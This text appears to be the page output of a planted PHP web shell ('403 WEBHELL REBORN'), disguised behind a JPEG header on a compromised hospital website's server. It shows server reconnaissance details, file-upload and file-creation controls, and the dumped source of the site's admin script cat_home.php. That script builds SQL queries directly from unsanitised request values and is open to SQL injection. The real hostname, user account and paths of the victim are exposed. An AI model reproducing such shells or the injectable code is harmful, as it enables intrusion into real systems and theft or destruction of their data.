ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/public_html/adminvn/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/public_html///////adminvn/cat_home.php
<?php

/*----------------------------------------*\
|             Copyright © C-ILY            | 
|            Phone: 0983.998.994           |
|             Y!m: notepad.html            |
|         Email: truongpv87@gmail.com      |
\*----------------------------------------*/

define('CILY',true);
include('../#includes/config.php');
if(check_log() == true) {
    if($_GET['type'] == 'add'){

        if ($_POST['order'] != '1'){$_SESSION['cath_order'] = $_POST['order'] + '1';} else {$_SESSION['cath_order'] = '2';}
        $_SESSION['cathpost'] = $_POST['kieu'];
        @mysql_query("INSERT INTO cily_cathome (cath_id, cath_order, cath_type, cath_img) VALUES ('".addsla($_POST['name'])."', '".$_POST['order']."', '".$_POST['kieu']."', '".$_POST['img']."')");
        header('Location: index.php?m=12&sm=5');
    }
    
    elseif($_GET['type'] == 'edit'){
        $checkimg = explode('/',$_POST['img']);
        if ($checkimg[4] == 'df-img.png') $_POST['img'] = '';
        @mysql_query("UPDATE cily_cathome SET cath_id = '".addsla($_POST['name'])."', cath_order = '".$_POST['order']."', cath_type = '".$_POST['kieu']."', cath_img = '".$_POST['img']."' WHERE id = ".$_POST['id']."");
        header('Location: index.php?m=12&sm=5');
    }
    
    elseif($_GET['type'] == 'del' && $_POST['action'] == 1 && $_POST['id']){
        $total = count($_POST['id']);
        for($i=0; $i<$total; $i++) {

            $datapost = @mysql_fetch_array(@mysql_query("SELECT * FROM cily_cathome WHERE id = ".$_POST['id'][$i]));
            $dtfullimg = @str_replace('thumbs-','',$datapost['cath_img']);
            $url = @str_replace(URL_SITE, "..", $dtfullimg);
            $thumb = @str_replace(URL_SITE, "..", $datapost['cath_img']);
            $deldata = $dtfullimg;

            if ($url != $thumb) {
                @unlink($url);
                @unlink($thumb);
            }
            @mysql_query("DELETE FROM cily_datas WHERE data_url LIKE '%".$deldata."%'");
            @mysql_query("DELETE FROM cily_cathome WHERE id = ".$_POST['id'][$i]);
        }
        header('Location: index.php?m=12&sm=5');
    }
    
    elseif($_GET['type'] == 'state'){
        $getid = $_GET['id'];
        $getoc = $_GET['oc'];
	@mysql_query("UPDATE cily_cathome SET cath_home = '".$getoc."' WHERE id = ".$getid);
        header('Location: index.php?m=12&sm=5');
    }

    elseif($_GET['type'] == 'del' && $_POST['action'] == 1 && $_POST['c_id']){
        $total = count($_POST['c_id']);
        for($i=0; $i<$total; $i++) {
            @mysql_query("DELETE FROM cily_cathome WHERE id = ".$_POST['c_id'][$i]);
        }
        header('Location: index.php?m=12&sm=5');
    }
    elseif($_GET['type'] == 'del' && $_POST['action'] == 2){
    $idm = $_POST["rowid"];
    $sttm = $_POST["idorder"];
    $lap=count($idm);
    for($i=0; $i<$lap; $i++) {
            @mysql_query("UPDATE cily_cathome SET cath_order = ".$sttm[$i]." WHERE id = ".$idm[$i]);
    }
        header('Location: index.php?m=12&sm=5');
    }
    
    else header('Location: index.php?m=12&sm=5');
}

else echo "Hacking attempt";


?>

Anon7 - 2021